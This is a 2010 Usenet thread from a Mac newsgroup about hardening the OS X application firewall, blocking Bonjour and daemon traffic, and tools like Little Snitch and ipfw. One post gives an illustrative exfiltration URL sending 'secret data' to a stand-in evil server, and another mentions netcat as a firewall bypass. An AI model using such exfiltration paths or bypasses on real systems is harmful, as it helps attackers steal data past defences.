OS X firewall - how to make it actually work
in [UK Mac]
|
From: Jim on 21 Jan 2010 08:40 On 2010-01-21, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote: > > Indeed. I'm off to get something to eat, then there's going to be some > savage butchery to this file when I get back. Thank you so much. > I think it goes without saying that you should probably back it up first..:-) Jim -- http://www.ursaMinorBeta.co.uk http://twitter.com/GreyAreaUK "Get over here. Now. Might be advisable to wear brown trousers and a shirt the colour of blood." Malcolm Tucker, "The Thick of It"
From: Richard Tobin on 21 Jan 2010 08:57 In article <7rr1pcFojU1(a)mid.individual.net>, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote: >> Why can netcat do things that the malware itself can't? Are you >> suggesting that netcat would be an application trusted by the >> firewall? >Apparently, Apple have pre-signed many of the standard OS components to >allow them access through the firewall without needing explicit rules in >the firewall or asking for user permission. Is netcat such a component? But see below about web browsers. >> I would have thought it was too tedious to control outgoing >> connections by application (rather than port). >No, that's the whole point of an "application" firewall as opposed to a >network level firewall. I understand the distinction between application and network level firewalls. But for *outgoing* connections connections controlling it at the application level seems too tedious: there are hundreds of commonly used programs that make outgoing connections, but just a few that accept incoming ones. And many of those programs can, by design, connect to anything. For example, any web browser could be used to send data to an arbitrary port TCP on an arbitrary server - just tell it to go to http://myevilserver.com:666/[lots-of-secret-data] Are you considering a machine so locked down that it mustn't be able to run a web browser? If so, I would have thought a network-level firewall that only allowed connections to trusted hosts would be a better solution. -- Richard -- Please remember to mention me / in tapes you leave behind.
From: Gordon on 21 Jan 2010 09:17 On Jan 21, 8:59 am, James Taylor <use...(a)oakseed.demon.co.uk.invalid> wrote: > Hi, > > I'm trying to find out how to get the OS X application firewall to block > access to all incoming traffic except for one application, VMware. > Unfortunately the OS X application firewall is essentially useless > because it allows all manner of things to easily bypass it, either > directly or by using a command line tool ushc as netcat. See: > <http://www.h-online.com/security/news/item/Apple-documents-Leopard-fi...> > > I know Apple are pretty clueless about security, but leaving all root > owned listening processes open even when the firewall is fully locked? > That's crazy! Can anyone tell me how to get the application firewall to > actually do its job and block incoming access to everything but VMware? > > Equally, I'd like to disable completely (or at least block the incoming > and outgoing traffic of) system daemons such as configd, mDNSResponder, > the Finder using nmblookup and smbclient, DirectoryService, ntpd, and > there may be others. I want total "silence on the wire". If anyone knows > how to disable any of those chatty daemons I'd be very very grateful to > hear how (launchd maybe?). > > I've been tinkering with this on and off for months. I'm getting > desperate now. I'm on the point of wiping VMware and even OS X off my > brand new MacBook Pro and installing Linux with KVM just so I can get a > properly secured VM hosting environment for my work. > > Anyone know anything about Mac networking here? > > -- > James Taylor What about Little Snitch? Might that let you lock the system down enough for your tastes?
From: David Stone on 21 Jan 2010 09:34 In article <slrnhlg9bl.165.jim(a)wotan.magrathea.local>, Jim <jim(a)magrathea.plus.com> wrote: > On 2010-01-21, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote: > > Jim wrote: > > > >> This is probably a hopelessly simplistic answer, but could you not simply > >> put the Mac's network adaptor on a 10.x.y.z network, then put the VM's > >> adaptors onto the realworld network? > > > > Nice idea Jim, but sadly that doesn't stop OS X from Bonjouring everyone > > on the network about your machine name, IP address, listening services, > > etc, and thus it would be very easy for a malicious agent (virus, > > hacker, whatever) on the same LAN segment to see you and then attack the > > IP address you were on whatever you set it to. > > Bother. I use Waterroof to configure ipfw to block all the Bonjour stuff: http://www.hanynet.com/waterroof/ This has the added benefit of keeping the log files to a reasonable size! If you use this application, don't forget to use the "Install Startup Script" option once you have the rules tweaked the way you want, or you'll have to manually reload them after each restart. This is in addition to the appfirewall, which is currently set to "Allow only essential services".
From: Woody on 21 Jan 2010 09:47
Jim <jim(a)magrathea.plus.com> wrote: > On 2010-01-21, James Taylor <usenet(a)oakseed.demon.co.uk.invalid> wrote: > > > > Indeed. I'm off to get something to eat, then there's going to be some > > savage butchery to this file when I get back. Thank you so much. > > > > I think it goes without saying that you should probably back it up > first..:-) Pah - where is your sense of adventure? -- Woody |